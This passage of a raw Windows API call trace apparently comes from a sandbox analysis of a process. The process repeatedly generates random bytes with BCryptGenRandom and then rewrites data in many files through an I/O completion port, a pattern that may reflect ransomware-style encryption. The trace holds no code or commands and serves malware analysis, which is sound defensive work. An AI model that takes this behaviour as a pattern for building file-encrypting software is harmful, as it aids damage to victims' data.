lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.037] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0085.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.076] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0085.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.077] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0085.081] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.081] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.081] free (_Block=0x77d800) [0085.081] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.082] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.082] free (_Block=0x1ff1930) [0085.082] free (_Block=0x1ff1a40) [0085.082] free (_Block=0x77d908) [0085.082] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.082] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.119] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.120] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0085.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.120] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0085.124] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.124] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.124] free (_Block=0x77d800) [0085.124] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.124] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.125] free (_Block=0x1ff1930) [0085.125] free (_Block=0x1ff1a40) [0085.125] free (_Block=0x77d908) [0085.125] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.125] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.128] CloseHandle (hObject=0x3b8) returned 1 [0085.374] free (_Block=0x3df0008) [0085.378] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.471] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0085.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0085.472] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0085.472] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0085.472] free (_Block=0x1ff1e60) [0085.472] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0085.472] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0085.473] free (_Block=0x1ff1e60) [0085.473] free (_Block=0x1ff1930) [0085.473] free (_Block=0x77d800) [0085.473] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.491] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0085.491] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.492] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0085.492] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.492] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.492] free (_Block=0x77d800) [0085.492] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.492] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.493] free (_Block=0x1ff1930) [0085.493] free (_Block=0x1ff1a40) [0085.493] free (_Block=0x77d908) [0085.493] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0085.493] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.511] CloseHandle (hObject=0x3b8) returned 1 [0085.512] free (_Block=0x1fb18c0) [0085.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.532] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.532] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.546] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.546] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0085.547] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.547] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0085.547] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.548] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.548] free (_Block=0x77d800) [0085.548] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.548] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.548] free (_Block=0x1ff1930) [0085.548] free (_Block=0x1ff1a40) [0085.548] free (_Block=0x77d908) [0085.548] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0085.571] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0085.575] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.575] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.575] free (_Block=0x77d800) [0085.575] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.575] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.576] free (_Block=0x1ff1930) [0085.576] free (_Block=0x1ff1a40) [0085.576] free (_Block=0x77d908) [0085.576] WriteFile (in: hFile=0x3bc, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0085.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.589] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0085.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0085.593] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.594] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.594] free (_Block=0x77d800) [0085.594] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.594] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.594] free (_Block=0x1ff1930) [0085.594] free (_Block=0x1ff1a40) [0085.594] free (_Block=0x77d908) [0085.594] WriteFile (in: hFile=0x3c4, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0085.595] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.980] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.980] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.981] WriteFile (in: hFile=0x3ac, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0085.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0085.982] WriteFile (in: hFile=0x3b8, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.015] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0086.015] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.016] CloseHandle (hObject=0x3bc) returned 1 [0086.019] free (_Block=0x1ff1e60) [0086.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.031] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.032] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0086.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.032] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0086.032] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.032] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.032] free (_Block=0x1ff1e60) [0086.032] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.032] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.033] free (_Block=0x1ff1e60) [0086.033] free (_Block=0x1ff1930) [0086.033] free (_Block=0x77d800) [0086.033] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.033] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.034] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.048] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.048] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.049] CloseHandle (hObject=0x3bc) returned 1 [0086.052] free (_Block=0x1fb18c0) [0086.052] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.062] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.062] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0086.062] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.063] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0086.063] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.063] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.063] free (_Block=0x1ff1e60) [0086.063] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.063] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.064] free (_Block=0x1ff1e60) [0086.064] free (_Block=0x1ff1930) [0086.064] free (_Block=0x77d800) [0086.064] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.064] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.065] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.065] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.082] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.082] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.082] CloseHandle (hObject=0x3bc) returned 1 [0086.087] free (_Block=0x1fb18c0) [0086.087] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.098] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.099] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0086.099] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.099] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0086.099] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.099] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.099] free (_Block=0x1ff1e60) [0086.099] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.099] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.100] free (_Block=0x1ff1e60) [0086.100] free (_Block=0x1ff1930) [0086.100] free (_Block=0x77d800) [0086.100] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.100] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.101] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.101] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.114] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0086.115] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.115] CloseHandle (hObject=0x3bc) returned 1 [0086.116] free (_Block=0x1fb18c0) [0086.116] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0086.126] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0086.126] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.127] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0086.127] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0086.127] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0086.127] free (_Block=0x1ff1e60) [0086.127] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0086.127] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0086.127] free (_Block=0x1ff1e60) [0086.127] free (_Block=0x1ff1930) [0086.127] free (_Block=0x77d800) [0086.127] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, 